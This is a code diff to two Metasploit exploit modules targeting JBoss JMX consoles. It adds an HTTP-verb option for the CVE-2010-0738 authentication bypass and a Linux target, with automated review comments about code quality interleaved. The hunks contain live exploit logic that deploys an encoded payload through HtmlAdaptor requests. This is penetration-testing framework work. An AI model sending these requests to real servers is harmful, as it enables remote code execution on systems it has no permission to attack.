diff --git a/modules/exploits/multi/http/jboss_deploymentfilerepository.rb b/modules/exploits/multi/http/jboss_deploymentfilerepository.rb
index 0099d75878..2fe91c9fa1 100644
--- a/modules/exploits/multi/http/jboss_deploymentfilerepository.rb
+++ b/modules/exploits/multi/http/jboss_deploymentfilerepository.rb
@@ -32,6 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote
 'References' =>
 [
 [ 'CVE', '2006-5750' ],
+ [ 'CVE', '2010-0738' ], # by using VERB other than GET/POST
 [ 'OSVDB', '30767'],
 [ 'BID', '21219' ]
 ],
@@ -57,7 +58,8 @@ class Metasploit3 < Msf::Exploit::Remote
 Opt::RPORT(8080),
 OptString.new('SHELL', [ true, "The system shell to use.", '/bin/sh']),
 OptString.new('URI', [ true, "The URI to call the payload.", '/web-console/']),
- OptString.new('PATH', [ true, "The URI to deploy the payload.", 'console-mgr.sar/web-console.war/'])
+ OptString.new('PATH', [ true, "The URI to deploy the payload.", 'console-mgr.sar/web-console.war/']),
+ OptString.new('VERB', [ true, "The HTTP verb to use", "POST"]),
 ], self.class)
 end
@@ -68,10 +70,10 @@ class Metasploit3 < Msf::Exploit::Remote
 res = send_request_cgi(
 {
 'uri' => '/jmx-console/HtmlAdaptor',
- 'method' => 'POST',
+ 'method' => datastore['VERB'],
 'data' => 'action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=5&arg0=' +
- Rex::Text.uri_encode(datastore['PATH']) + '&arg1=' + fname + '&arg2=.jsp&arg3=' +
- Rex::Text.uri_encode(payload.encoded) + '&arg4=True',
+ Rex::Text.uri_encode(datastore['PATH']) + '&arg1=' + fname + '&arg2=.jsp&arg3=' +
+ Rex::Text.uri_encode(payload.encoded) + '&arg4=True',
 })
 if (res.code == 200)
diff --git a/modules/exploits/multi/http/jboss_maindeployer.rb b/modules/exploits/multi/http/jboss_maindeployer.rb
index bf594df851..ba140054e4 100644
--- a/modules/exploits/multi/http/jboss_maindeployer.rb
+++ b/modules/exploits/multi/http/jboss_maindeployer.rb
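Review bot: The new `VERB` option in the second hunk is a free-form `OptString` whose description, "The HTTP verb to use", does not say why an operator would change it, and whatever is entered is passed unvalidated as `'method'` in the next hunk. The reference comment ties CVE-2010-0738 to verbs other than GET/POST, so the default of `POST` never exercises that CVE; the description should say so, e.g. `"The HTTP verb to use (CVE-2010-0738 only applies to verbs other than GET/POST)"`. An `OptEnum` restricted to the verbs the module has actually been tested with would reject typos when the option is set. The same applies to the `VERB` option added in jboss_maindeployer.rb.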
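Review bot: `if (res.code == 200)` at the end of the third hunk dereferences `res` without a nil check, and `send_request_cgi` can return nil when no response arrives, which is more likely once the verb is operator-chosen; `if (res and res.code == 200)` keeps the failure path clean. The two `Rex::Text.uri_encode` lines are removed and re-added with identical visible text, so that part looks like whitespace-only churn and would be better left out of this commit. The enclosing method starts before the hunk and the `if` body continues past it.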
@@ -34,11 +34,12 @@ class Metasploit3 < Msf::Exploit::Remote
 'References' =>
 [
 [ 'CVE', '2007-1036' ],
+ [ 'CVE', '2010-0738' ], # by using VERB other than GET/POST
 [ 'OSVDB', '33744' ],
 [ 'URL', 'http://www.redteam-pentesting.de/publications/2009-11-30-Whitepaper_Whos-the-JBoss-now_RedTeam-Pentesting_EN.pdf' ]
 ],
 'Privileged' => true,
- 'Platform' => [ 'win' ], # linux untested
+ 'Platform' => [ 'win', 'linux' ], # linux untested
 'Stance' => Msf::Exploit::Stance::Aggressive,
 'Targets' =>
 [
@@ -55,6 +56,12 @@ class Metasploit3 < Msf::Exploit::Remote
 'Arch' => ARCH_X86,
 'Platform' => 'win'
 },
+ ],
+ [ 'Linux Universal',
+ {
+ 'Arch' => ARCH_X86,
+ 'Platform' => 'linux'
+ },
 ]
 ],
 'DefaultTarget' => 0))
@@ -64,7 +71,8 @@ class Metasploit3 < Msf::Exploit::Remote
 Opt::RPORT(8080),
 OptString.new('USERNAME', [ false, 'The username to authenticate as' ]),
 OptString.new('PASSWORD', [ false, 'The password for the specified username' ]),
- OptString.new('PATH', [ true, "The URI path of the console", '/jmx-console'])
+ OptString.new('PATH', [ true, 'The URI path of the console', '/jmx-console']),
+ OptString.new('VERB', [ true, 'The HTTP verb to use', 'POST']),
 ], self.class)
 end
@@ -140,15 +148,19 @@ class Metasploit3 < Msf::Exploit::Remote
 },
 'Path' => resource_uri
 }})
+ print_status("Making the request to the MainDeployer...")
 res = send_request_cgi({
- 'method' => 'POST',
+ 'method' => datastore['VERB'],
 'uri' => datastore['PATH'] + '/HtmlAdaptor',
 'vars_post' =>
 {
 'action' => 'invokeOp',
 'name' => 'jboss.system:service=MainDeployer',
- 'methodIndex' => '21', # deploy via java.net.URL
+ # deploy via java.net.URL
+ 'methodIndex' => '3', # jboss 4.0.5
+ #'methodIndex' => '21', # jboss 3.0.8
+ #'methodIndex' => '23', # jboss 3.2.7
 'arg0' => service_url
 }
 }, 20)
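Review bot: `'Platform' => [ 'win', 'linux' ], # linux untested` now advertises Linux support while the trailing comment still says it is untested, and the 'Linux Universal' target added in the next hunk carries the same caveat. Either record what the target was verified against and drop the comment, or leave the platform list unchanged until that has been done. The target name says 'Universal' although its `'Arch'` is limited to `ARCH_X86`, so a short comment on the target stating its actual scope would avoid the mismatch.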
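Review bot: The hard-coded `'methodIndex'` changes from `'21'` to `'3'` in the last hunk on this line, and the commit's own comments say the value depends on the JBoss version, so this silently changes behaviour for anyone relying on the previous value. The other two values are left as commented-out code, so switching between them means editing the module source; a documented setting would be easier to maintain, and the commit description should mention the change. The comment `# deploy via java.net.URL` now sits above three candidate lines and should state that each index is meant to select the same operation on a different version, if that is the intent. The same `VERB` substitution is applied to the undeploy request in the following hunk, and the enclosing method begins before and ends after this one.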
@@ -199,7 +211,7 @@ class Metasploit3 < Msf::Exploit::Remote # print_status("Undeploying #{app_base} ...") res = send_request_cgi({ - 'method' => 'POST', + 'method' => datastore['VERB'], 'uri' => datastore['PATH'] + '/HtmlAdaptor', 'vars_post' => {